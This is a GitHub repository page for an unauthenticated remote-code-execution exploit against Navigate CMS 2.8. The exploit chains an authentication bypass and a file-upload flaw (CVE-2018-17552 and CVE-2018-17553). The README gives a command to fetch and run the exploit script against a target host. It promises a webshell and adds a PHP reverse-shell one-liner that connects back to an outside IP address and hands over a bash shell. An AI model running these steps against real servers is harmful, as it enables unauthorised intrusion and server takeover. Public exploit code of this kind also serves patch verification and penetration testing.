Skip to content

0x4r2/Navigate-CMS-RCE-Unauthenticated-

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

README.md

README.md

 
 

navigate_RCE.sh

navigate_RCE.sh

 
 

Repository files navigation

Navigate-CMS-RCE -Unauthenticated-

This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8

This script exploits:

  • CVE 2018-17552 # Authentication bypass
  • CVE 2018-17553 # File upload

Use Mode

wget https://raw.githubusercontent.com/0x4r2/Navigate-CMS-RCE-Unauthenticated-/main/navigate_RCE.sh

./navigate_RCE.sh navigator.hm

image

Getting a simple webshell. Enjoy!

Tip: Upgrade to ReverseShell

php -r '$sock=fsockopen("192.168.153.133",9000);system("/bin/bash <&3 >&3 2>&3");'

image

About

This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages